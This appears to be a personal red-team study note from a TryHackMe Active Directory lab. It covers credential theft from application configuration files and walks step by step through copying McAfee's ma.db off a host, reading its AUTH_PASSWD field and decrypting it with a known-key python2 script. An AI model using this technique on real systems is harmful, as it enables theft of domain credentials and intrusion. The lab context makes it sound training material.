RedTeam
5.Machine
3.Active-Directory
General
Exploitation
2.Breaching-AD
5.configuration Files

General

Configuration files are used by applications to store various types of configuration information, such as settings, options, and parameters. These files may contain sensitive information, such as passwords, secrets, and credentials, which are used by the application to authenticate to other systems or services. If an attacker is able to access or modify the configuration files, they may be able to use this information to gain unauthorized access to the systems or services that the application is configured to connect to.

One way that configuration files can be exploited is by modifying the configuration options to include malicious parameters or values. For example, an attacker could modify a configuration file to include a malicious URL or command that is executed when the application is started. This could allow the attacker to execute arbitrary code or commands on the system, potentially leading to further compromise.

Another way that configuration files can be exploited is by extracting sensitive information from the files and using it to gain access to other systems or services. For example, an attacker could extract a password from a configuration file and use it to log in to a web application or server.

Commands

Configuration File Credentials

We will focus on recovering credentials from a centrally deployed application in this task. Usually, these applications need a method to authenticate to the domain during both the installation and execution phases.

Example MMcAfee Enterprise Endpoint Security, which organisations can use as the endpoint detection and response tool for security.
ㅤ McAfee embeds the credentials used during installation to connect back to the orchestrator in a file called ma.db. This database file can be retrieved and read with local access to the host to recover the associated AD service account. We will be using the SSH access on THMJMP1 again for this exercise.

Find a database in an application configuration (example ma.db)

thm@THMJMP1 C:\Users\THM>cd C:\ProgramData\McAfee\Agent\DB
thm@THMJMP1 C:\ProgramData\McAfee\Agent\DB>dir
 Volume in drive C is Windows 10
 Volume Serial Number is 6A0F-AA0F

 Directory of C:\ProgramData\McAfee\Agent\DB      

03/05/2022  10:03 AM    <DIR>          .
03/05/2022  10:03 AM    <DIR>          ..
03/05/2022  10:03 AM           120,832 ma.db      
               1 File(s)        120,832 bytes     
               2 Dir(s)  39,426,285,568 bytes free

Copy the file to the your attacking machine (SCP)

thm@thm:~/thm# scp thm@THMJMP1.za.tryhackme.com:C:/ProgramData/McAfee/Agent/DB/ma.db .
thm@10.200.4.249's password:
ma.db 100%  118KB 144.1KB/s   00:00

Read the database (SQLiteBrowser)

sqlitebrowser ma.db

Using sqlitebrowser, we will select the Browse Data option and focus on the AGENT_REPOSITORIES table:

We are particularly interested in the second entry focusing on the DOMAIN, AUTH_USER, and AUTH_PASSWD field entries. Make a note of the values stored in these entries. However, the AUTH_PASSWD field is encrypted. Luckily, McAfee encrypts this field with a known key. Therefore, we will use the following old python2 script to decrypt the password.

===From here, it will be different depending on the database en the encryption the application is using. search on google if the encrypted key of this application has been leaked before and if some people on github has develop some script to exploit the encrypted password===

You will have to unzip the mcafee-sitelist-pwd-decryption.zip file:

unzip mcafeesitelistpwddecryption.zip

Note: The tool we will use here is quite old. It uses Python v2 and relies on an old crypto library. If you cannot get the script to work on your own VM, please make use of the AttackBox.

By providing the script with our base64 encoded and encrypted password, the script will provide the decrypted password:

thm@thm:~/root/Rooms/BreachingAD/task7/mcafee-sitelist-pwd-decryption-master$ python2 mcafee_sitelist_pwd_decrypt.py <AUTH PASSWD VALUE>
Crypted password   : <AUTH PASSWD VALUE>
Decrypted password : <Decrypted Pasword>

We now once again have a set of AD credentials that we can use for further enumeration! This is just one example of recovering credentials from configuration files. If you are ever able to gain a foothold on a host, make sure to follow a detailed and refined methodology to ensure that you recover all loot from the host, including credentials and other sensitive information that can be stored in configuration files.